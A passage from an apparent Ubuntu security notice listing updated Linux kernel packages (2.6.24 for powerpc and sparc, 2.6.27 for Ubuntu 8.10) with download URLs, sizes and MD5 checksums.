http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   105746 034c14e0418581e1b8b56913246e96de
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    44824 5430e2953cc84d26fd0c8e8c4e323a92
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    40932 93dc2a167cf8ab1d80426dd296997295
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   704830 ef370acc49192e464ef553984e361d88
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   770960 ac691fac4ab28cb6d9627fa6b7a5b773
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   243328 b280fefee27294e988529239616e68fe
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   246310 c1d7e140ca2ba026b6a168c6c9748476
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    69160 665a09e07612701e5c6bc7efee856e5c
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   132586 f0e732beade4d5154e887aaa1b1f3625
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    70252 d8f056e2c9d8aabe9acacfbe4e6c9de0
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    77462 d69a84be1856d83b83faf1fa820803f6
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   146272 11a1d0911e3fda9667661975972e08b2
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   165002 c4276844b0ea79946508c0cd3a816541
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   387992 53b23049b6f79a9609349927adec3443
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   350468 694a94354856e10bcc935e2a7ba38a51
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  2431460 3a8171d7d1e7e6b37573c6679812d2ae
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  3473330 1037b52b34e3b26b05f68bfafb48850a
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb
  Size/MD5:   652854 26483fb509f744914f646c49eb7b4d6c
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb
  Size/MD5:   657530 98dd4c49966d886237bed19fddb84057
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb
  Size/MD5:   652742 c9f225771751b175bc9a3d1ccb9b2b91
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb
  Size/MD5: 20175388 98b77e06737b717f07a9f436bf292879
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb
  Size/MD5: 21378902 be6b07df3db6828d5d795954b3ad3c49
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb
  Size/MD5: 19948474 1a42e203300936a0a6bbd91270ac925d
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_powerpc.deb
  Size/MD5:   697738 b5f3e2a2bf27249b08f44ca708c75305
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   266748 d71a805e23acc800f21449d312975e04
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   307732 90c6243c8802cdc121bdf92145f7dc17
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   192250 b114447f81aee3dfc51a3c40f2015d66
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   201688 94056840984e621b385099d261ce2420
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   272012 b6790aca1401ed43b8c04befaef9af51
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   306006 50b970f3b69d4eda6d3e59353c9db152
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  1807766 ec7ddb35df35bb103f7fa00168c827cd
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  2119612 ee4db3863509964860b0a24a9a6d5951
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   235186 b6a1a89f7279818e17cac5d5b3a8b86e
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   225404 baf5ea09bdbab57626dee3afb306a39b
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   170438 b6bae0ce9350745a5c5ba8d969ae34ef
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   199752 9d4225f0960410c78279f61aa02471da
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   117942 e88c2b968d47d71ef068dcb5abd4d9fd
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   139272 5f4576b20a9dc27976d521d0942ad0c9
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    45372 918120c1bd011bbbb8b95529c0978f09
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    46836 10f5de3e02406e28d373098a6613860b
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    51132 610f6b349ffcb68ca7f58dc7928a7558
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    60292 9b17fdf2d2aa9cbcfd3dbfb1bfc3af41
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    74186 053cc99e1839e95e6e48198a187c3e48
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    87220 b730de88a2ee8d0b1503d2ee30f13e69
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    76092 0a6aab3a33606ec7e97d474de29a47db
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    30230 76c4d08ce66715d75db459c89405a0fb
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:     8486 80580934d5e5f6909c396732bedf2055
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    10030 4e52e0e6b321b919404ffa406ccc2da1
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    57438 24e1b5d61bcbe2b2faf9f31d9b6f7d3b
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    68746 1b541e58e95b8022b84e7d050db97ecc
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   101184 97ff0fdbf93ef2526b1a97b962592e37
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   147834 eb62d695f6da016ae938924414bd15ed
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  1565722 3bf6b2bd7ef98c403f8cedf220978814
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  1514590 307c47dc707e3c96384e6ce043c745be
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    76672 863a1d5aaef2e7d8f5ec43318a2b3f7a
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    85976 b6bedff825f704ceb1269488d698bfbf
http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    12702 cc2c9e83433b8f4092748b933292a46b
http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    14560 60c8e6f2c5425b8bfea2cbee00dd50c2
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   449632 ff75fd65c13af279e6652e0d09505887
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   504134 364077fbb2c074eb8852249a757b89ae
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    83682 bcafd92384fdae95293c310f83443303
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   108840 2254f5416b8a0cd8d1cd52a57d7a064a

sparc architecture (Sun SPARC/UltraSPARC):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    59570 0a8a1c6f109f6620c74d81880a6836ef
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    71732 e29b3839ae80a5cc8b8ca1756569e0bb
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    42454 35c72663f93201098e40f0fc36232ccc
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    91776 d7f14f387c9d325ba87761a2da581b5c
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   587190 a4606a71370a3dec9dc6a3aba35ec115
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   171076 2f15afec1e2aa78035659ac46b010cb3
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    22356 aa2c6396604a45f318881df2e562f625
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    46058 5633652b0f71f9e2098ce2798e29269f
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   152976 d7cbf92b5ae85f379d0335c693ccc256
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:  2135270 f05d76791e5538fa887f7731d170dc58
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb
  Size/MD5:   565588 5d632e2a56604e4feff30e310f17f024
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb
  Size/MD5:   563928 4b591c5db77c0f5bc41ffff32a14ee31
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb
  Size/MD5: 14098262 0170c4f2c460270add65ba17eb7acfd0
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb
  Size/MD5: 13830862 e4b6c695ad5b3e4ad0b428947b4fd388
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_sparc.deb
  Size/MD5:   752654 6e9b50c2f72a60edf4df6e51d5448cc7
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   270064 879ee6667df636551d565e10ae5162fd
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   190360 388a92b9849a34e99f6a3d2817ca9b05
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   263030 82e8bd5f9f922af935f6f787942f4b2f
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:  1386520 98436d21f7255a6c923b50900bd2de4d
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   175444 37239b1899dd449d5b4985163c46d678
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   122106 1b86f75278b7fab22bbffd2c0010eef5
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    40398 81325db98acd64573c100455f0cb5289
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    48060 dd1b8744fcecf5959d2dac4a23b8cd34
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:     8698 a2a5a2941546e0137d8c57a38ba9ab2f
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    60516 08d388a60ac9be5c7d80d479f94fd4aa
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   106838 b350cddddb73537859dce8203c49ac1d
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:  1002034 0756e59f467bdefbc26dcb06a6201457
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:     9518 7bf2df83ac5364fef90bf13ea616e7e3
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   391514 9e98f9f4757387d261d6c7a1e8c7d61d
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    75924 b375f2838ce3f024a9f2b58d02f9d98e

Updated packages for Ubuntu 8.10:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.diff.gz
  Size/MD5:  3279295 99a1653c9f3eb96475ee9776faff3701
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.dsc
  Size/MD5:     2761 3b7c2f9d1b970a69db9a1c2c2bd5d95c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz
  Size/MD5: 63721466 482b04f680ce6676114ccfaaf8f66a55

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-17.45_all.deb
  Size/MD5:  3492310 1dbaf1873425d41dfce3b359fc95728e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17_2.6.27-17.45_all.deb
  Size/MD5:  5906568 e4cb3deaf39ad7c3917d33f0f1082a40
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-17.45_all.deb
  Size/MD5: 52050112 2852d57c251b525e97d6ba66a94f1be5

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    36530 ae958becd299698d5f30f722eb07cde7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   265218 1de0174009daaf9e0d3fb8f8e737fa40
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    53438 46087922e5b4128b6a5f52dcacfbf840
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    43030 e25c2b8fbd4f46654a1ebc6089ef31bc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    52344 4c16a22c0fe8f2a967f1503953ed5f8c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    89844 4cc23c275cc1fd6621ac977881b91345
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    38180 24f5566a9c89334d394fb48d7c3d4949
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   677070 84220f4d0562b59edd2f0865120d4494
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   158618 edbaf560c5847b8f520ad94cd3f8d2d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    46346 90f299bb91f23a67e0811ae8e0472e70
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   154240 3ccfee605d2ef5a5e87aeb71320b337b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   313106 896f96e4eb01ff9381aaa78b6e1dc72d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:  2604320 b50756ed8aeeee4a72873b8c60df10b6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_amd64.deb
  Size/MD5:   663304 ef966b97630e8096fcf279d6c43b3960
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_amd64.deb
  Size/MD5:   662184 599a4bf3bad78733d35ad1b4a5601a25
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_amd64.deb
  Size/MD5: 23073032 96da11b5c1a75a1694b4047c1a71b091
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_amd64.deb
  Size/MD5: 23071096 162a682066d9c7d90df92c975698b2cd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_amd64.deb
  Size/MD5: 10479836 39042ef6e7f9049837b4d137450dc41a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_amd64.deb
  Size/MD5:   675844 3d711e518906ef37120bccabeaa1da2d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   434926 cc27207ed63847b17eab47e1978c98fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   186500 940e6b351f4975369720543184596a04
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   275594 b525586af57630fd8b4e098cef404ad9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:  1810688 13f3abe5b38ff8a704c985dc8f3275b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   151324 d883249df4fb86d6d9d1146db5fa1020
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   194282 ee6a6162a8b0615e73a89978fcb9d172
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   168150 696ed64f02936c7200cc9a468302de40
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    36428 ff94b9ab68b2108fd9d1d2475c211725
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    83436 3dceac801e8b0405790e1a28c960183f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    71992 2b936af85a4eceb6312ad7ef93a18c88
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    23240 1d34a195f16d39f7895a2bf36281a6c8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:     9012 454b1c03d70fbf4a917ff2431b6b4f2b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    68544 cd2e39978716c3448e54d6862877957c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   110302 ecb1005946c139f2340aaee3e80cd152
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:  1276186 d93285c15892be57cfb76798c746f88d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    47602 d2039335dc8bb4104fbb473b5ada0d96
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    13480 5299f432e2db456a3e0743fd786c18f1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   393936 83cfaf207498b9a60d4e97cd21309095
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   200806 5dfbdf4ce61cbe469582c94509160a42
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    13614 c860448fa643364e8776a4947cff9714

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    33948 74da15b4b68dc6a03f2da65175b021bd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   244732 aee21df42a017731c52c53100cbf2f20
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    55398 f4d1c18a70aec1e3e39572c36318115c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    41206 42a8188a1ad868fa58aa779b31908d65
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    48698 7e06c0fbdb39f426e1259d35e8f1505e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    86942 49099dad48131ce191b10c154f096d6a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    34064 c8cf2cb88451687abb047df2faae44f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   675492 3e953f324652ef7a01f93aeaa2dc5e55
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   158402 aa593e2736e7b717ea8c561b1e11c27b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    43624 b2ca8774a7cf447123ea811781e80dbf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   145226 0fbb95dc0bc59baf91447250f19e7d45
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   302390 991c8e4ef2dda71d6deda5599129a768
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:  2436572 4b845d0a28c2b48ad0c29521bae3a0b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_i386.deb
  Size/MD5:   645046 28f8ea5f653057c350d40feb64d68f2d
